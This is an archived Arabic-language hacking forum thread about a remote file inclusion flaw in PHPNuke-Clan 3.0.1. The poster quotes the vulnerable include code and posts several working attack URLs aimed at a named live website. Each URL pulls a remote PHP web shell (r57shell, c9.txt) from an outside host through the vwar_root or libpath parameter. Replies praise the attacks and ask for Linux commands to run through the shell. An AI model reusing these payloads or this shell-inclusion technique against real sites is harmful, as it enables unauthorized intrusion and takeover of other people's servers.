PHPNuke-Clan 3.0.1 ثغره انكلود في المجله , [الأرشيف]

مشاهدة النسخة كاملة : PHPNuke-Clan 3.0.1 ثغره انكلود في المجله ,

متكي ورا الشمس

02-04-2006, 03:38

السلام عليكم ,,

قبل خمس دقايق نزلت ثغره في برنامج المجله التالي PHPNuke-Clan 3.0.1

المصدر والاستغلال من موقع milw0rm
وهذا الرابط
http://www.milw0rm.com/exploits/1630

--------------------------
ولكن استغلالي لها غير استغلالهم لانهم وضعوها بالبيرل ,, واكتشفت ثغره ثانيه نفس النوع وفي نفس الملف ,, ولكن في متغير اخر ,,

وهذا استغلالي ,,
http://www.anodyne-eve.com/modules/vWar_Account/includes/functions_common.php?vwar_root=http://rst.void.ru/download/r57shell.txt?cmd

--------------
الخطاء :

// get db class and connect to database
if (!class_exists("vwardb"))
{
include_once($vwar_root . "includes/classes/class_db.php");
$vwardb = new vwardb($sql['hostname'], $sql['username'], $sql['password'], $sql['database']);
}

## -------------------------------------------------------------------------------------------------------------- ##

// get template class
if (!class_exists("vwartpl"))
{
include_once($vwar_root . "includes/classes/class_template.php");
$vwartpl = new vwartpl;
}

---------------
اخوكم متكي

MeSa7eB

02-04-2006, 03:55

يعطيك العافية اخوي متكي ما قصرت يالذيب ..

احترامي

متكي ورا الشمس

02-04-2006, 04:01

هلا والله اخوي مسحب ,, اخيرا شفناك ,,

هلا ومسهلتين ,,

نور الموضوع كله والقسم كله ,,

AvIrL@BoY@LoVeR

02-04-2006, 02:45

يعطيك العافيه متكي

تشااو

DaBDouB-MoSiKaR

02-04-2006, 03:24

قويه اخ متكي
تابع

متكي ورا الشمس

02-04-2006, 03:53

الله يعافيكم ,, وحياكم ,,

الاستغلال حطيته مباشره عشان مايتعبكم البيرل ,,

والمتغير اللي مستغلينه غير اللي حاطينه هم ,,

المجله تستخدمها مواقع غربيه كثير ,,

بالتوفيق للجميع ,,

K_S_A

02-04-2006, 04:11

اخوي متكي ولا عليك امر لو تحط لنا اوامر لنكس الي نقدر نستخدمها مع الشل هذا
ارفع الشل وبعدها اقعد اناظر فيه مدري وش السالفه

قائد

02-04-2006, 06:53

ذيب يامتكي

x.dr.x

02-04-2006, 07:58

كفو ما شاء الله عليك

إلى الأمام دائماً إن شاء الله

تحياتي

المشتـاق

02-04-2006, 08:49

اهنيييييييييييييييييييييييييييييييك

مشكور.يآخاـفهم

متكي ورا الشمس

02-04-2006, 09:20

الله يعافيكم اخواني وشاكر مروركم ,,

وهذا استغلال اخر بعيد عن الاول من اكتشافي ايضا ,,

http://www.anodyne-eve.com/modules/vwar/includes/functions_common.php?vwar_root=http%3A%2F%2Fmember s.lycos.co.uk%2Fal3asfh2006%2Fup_ar%2Far%2Fc9.txt% 3Fcmd

والباقي كثير بس عساني افضى ,,

تحياتي

متكي ورا الشمس

02-04-2006, 09:32

وهذي ثغره اخرى بعيده عن الثنتين الاولات ,,

http://www.anodyne-eve.com/SQuery/lib/armygame.php?libpath=http%3A%2F%2Fmembers.lycos.co .uk%2Fal3asfh2006%2Fup_ar%2Far%2Fc9.txt%3Fcmd

:D

بالتوفيق,,

متكي ورا الشمس

02-04-2006, 09:40

لووووووووول

وهذي ملف اخر وغيرهم كلهم :D

وش ذا المجله هههههههه

http://www.anodyne-eve.com/SQuery/lib/ase.php?libpath=http%3A%2F%2Fmembers.lycos.co.uk%2 Fal3asfh2006%2Fup_ar%2Far%2Fc9.txt%3Fcmd

وهذي

http://www.anodyne-eve.com/SQuery/lib/devi.php?libpath=http%3A%2F%2Fmembers.lycos.co.uk% 2Fal3asfh2006%2Fup_ar%2Far%2Fc9.txt%3Fcmd

وهذي

http://www.anodyne-eve.com/SQuery/lib/doom3.php?libpath=http%3A%2F%2Fmembers.lycos.co.uk %2Fal3asfh2006%2Fup_ar%2Far%2Fc9.txt%3Fcmd

وهذي

http://www.anodyne-eve.com/SQuery/lib/*****point.php?libpath=http%3A%2F%2Fmembers.lycos. co.uk%2Fal3asfh2006%2Fup_ar%2Far%2Fc9.txt%3Fcmd

وكثير :D

لكن لين ارجع للبيت واكمل,, المجله فاشل مبرمجها شكله ,,

تحياتي

مافيا العرب

03-04-2006, 12:17

واللة انك مبدع
بس حطنا اوامر لنكس عشان نتعلم عليهم شوي

سلااااااااام

K_S_A

03-04-2006, 03:36

متكي بتحط لنا اوامر النكس ولا كيف <<<<<< باعهاااا

SaUdi-VirUs

03-04-2006, 08:00

لووووووووول كفو والله متكي :D

ومبدع ماشاء الله عليك ,

والي يسأل عن اوامر لينكس هذي كتابين تشرحها بالعربي ,

www.e-devil-x.com/linux.rar

www.e-devil-x.com/linux-devil.rar

واقروا موضوع dr.jr7

ومشكور اخوي متكي وفي انتظار جديدك ,

dr.jare7

03-04-2006, 09:25

مشكور واخي متكي وفي انتظار كل جديد منك....

K_S_A

03-04-2006, 11:52

الله يعطيك العافيه متكي

والله يعطيك العافيه سعودي

a_alsayad

24-06-2006, 05:57

جميل جدااااااااااااااااااااااااااااا